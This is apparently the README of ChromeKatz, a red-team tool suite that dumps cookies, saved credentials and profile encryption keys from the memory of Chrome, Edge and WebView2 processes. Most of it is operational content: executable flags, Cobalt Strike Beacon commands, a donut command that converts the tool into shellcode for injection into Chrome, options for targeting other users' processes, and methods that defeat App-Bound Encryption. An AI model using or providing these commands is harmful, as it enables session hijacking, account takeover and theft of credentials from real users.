
Dump cookies and credentials directly from Chrome/Edge process memory
ChromeKatz is a solution for dumping sensitive information from memory of Chromium based browsers. As for now, ChromeKatz consists of three projects:
CookieKatz has an exe, Beacon Object File, and minidump parser available. And for the ElevationKatz executable and Beacon Object File.
ElevationKatz is now capable of parsing the cookie and credentials databases from the browser memory and decrypting them for you.
CookieKatz has been completely revamped to use much more robust method for finding the cookies! New method supports older browser version as well. There is now new flag /inject implemented to CookieKatz to defeat the App-Bound Encryption on relevant browsers!
I need a coffee, and my cats need too!
CookieKatz is a project that allows operators to dump cookies from Chrome, Edge or Msedgewebview2 directly from the process memory. Chromium based browsers load all their cookies from the on-disk cookie database on startup.
The benefits of this approach are*:
These statements are still true on some browsers/applications. For latest versions of Chrome you will need to inject into the process. ... Our use the ElevationKatz
32bit browser installations are not supported and 32bit builds of CookieKatz are not supported either.
Currently only regular cookies are dumped. Chromium stores Partitioned Cookies in a different place and they are currently not included in the dump.
This solution consists of three projects, CookieKatz that is a PE executable, CookieKatz-BOF that is a Beacon Object File version and CookieKatzMinidump which is the minidump parser.
NOTE! When choosing using PID to target, use commands /list or cookie-katz-find respectively to choose the right subprocess!
Examples:
.\CookieKatz.exe
By default targets first available Chrome process
.\CookieKatz.exe /edge
Targets first available Edge process
.\CookieKatz.exe /pid:<pid>
Attempts to target given pid, expecting it to be Chrome
.\CookieKatz.exe /webview /pid:<pid>
Targets the given msedgewebview2 process
.\CookieKatz.exe /list /webview
Lists available webview processes
.\CookieKatz.exe /inject
Targets the current process. Use this flag when your are injecting CookieKatz to Chrome process.
TIP! If you need to inject CookieKatz into the Chrome process, you can turn the exe into shellcode using donut:
.\donut.exe -a 2 --input <Path_to_CookieKatz.exe> -z 4 -b 1 -p "/inject" -t
Flags:
/edge Target current user Edge process
/webview Target current user Msedgewebview2 process
/pid Attempt to dump given pid, for example, someone else's if running elevated
/list List targettable processes, use with /edge or /webview to target other browsers
/inject Indicate that the process will run in the target process
/out Write output to file, default location is "C:\Users\Public\Documents\cookies.log"
/help This what you just did! -h works as well
beacon> help cookie-katz
Dump cookies from Chrome or Edge
Use: cookie-katz [chrome|edge|webview] [pid]
beacon> help cookie-katz-find
Find processes for Cookie-Katz
Use: cookie-katz-find [chrome|edge|webview]
Usage:
CookieKatzMinidump.exe <Path_to_minidump_file>
Example:
.\CookieKatzMinidump.exe .\msedge.DMP
To target correct process for creating the minidump, you can use the following PowerShell command:
Get-WmiObject Win32_Process | where {$_.CommandLine -match 'network.mojom.NetworkService'} | select -Property Name,ProcessId
ElevationKatz lets operators to dump browser profile encryption key from memory to allow access for user's sensitive information. This works by starting a new browser process suspended, setting up break points and dumping the key once the browser process receives it from the elevator service.
The benefits of this approach are:
ElevationKatz will start a new browser process in suspended state and attach a debugger to it. Then it will scan the browser dll to find the instruction where the browser returns from call to os_crypt::DecryptAppBoundString and setting a breakpoint immediately after. Once the breakpoint is hit, the tool will dump the encryption key from the memory.
There are two breakpoint types which the operator may choose from: Software and Hardware breakpoints.
Additionally for HW breakpoints, there are two supported ways for thread enumeration to choose from: NtGetNextThread and CreateToolhelp32Snapshot. SW breakpoints do not need thread enumeration and therefore the /tl32 flag does not affect it.
New config parameter may be used to automatically decrypt the profile databases. This utilises IHack4Falafel's technique to parse the Cookie and Login Profile databases from the browser memory, avoiding touching the files directly.
Note dumping only works with the HW Breakpoints as I couldn't figure out how to properly cleanup the SW Breakpoints and rewind RIP to avoid the process crashing.